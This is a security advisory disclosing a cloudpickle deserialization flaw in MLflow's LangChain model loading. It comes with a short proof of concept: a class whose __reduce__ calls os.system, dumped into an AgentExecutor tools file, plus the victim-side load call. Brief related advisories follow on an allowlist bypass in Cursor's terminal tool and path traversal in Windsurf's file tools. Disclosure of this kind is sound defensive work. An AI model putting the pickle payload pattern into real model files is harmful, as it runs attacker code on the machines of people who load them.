SAI Security Advisory

Cloudpickle Load on Langchain AgentExecutor Model Load Leading to Code Execution

June 4, 2024

Summary

A deserialization vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. An attacker can inject a malicious pickle object into a model file on upload which will then be deserialized when the model is loaded, executing the malicious code on the victim machine.

Products Impacted

This vulnerability was introduced in version 2.5.0 of MLflow.

CVSS Score: 8.8

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

The vulnerability exists within the mlflow/langchain/utils.py file, within the function _load_from_pickle. This is called when the mlflow.langchain.load_model function is called.

def _load_from_pickle(path):
	with open(path, "rb") as f:
    		return cloudpickle.load(f)

An attacker can exploit this by building an AgentExecutor with Tools specially crafted to trigger the below elif statement within the _save_base_lcs function of the same utils.py file. The attacker could alter the code within this method, crafting a pickle object that will execute arbitrary code when deserialized and pass it to cloudpickle.dump().

/

elif isinstance(model, langchain.agents.agent.AgentExecutor):
    	...

    	if model.tools:
        	tools_data_path = os.path.join(path, _TOOLS_DATA_FILE_NAME)
        	try:
            	class RunCommand:
                	def __reduce__(self):
                    	return (os.system, ('ping -c 4 8.8.8.8',))

            	command = RunCommand()
            	with open(tools_data_path, "wb") as f:
                	cloudpickle.dump(command, f)

This model can then be logged to the server at the specified tracking URI by calling the model.langchain.log_model() function.

When the model is loaded by the victim (example code snippet below), the arbitrary code is executed on their machine:

/

import mlflow
...
logged_model = "models:/LangchainPickle/1"
loaded_model = mlflow.langchain.load_model(logged_model, dst_path='/tmp/langchain_model')

Related SAI Security Advisory

CVE-2025-62354

November 26, 2025

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

Cursor

When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.

November 2025
CVE-2025-62353

October 17, 2025

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

Windsurf

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

October 2025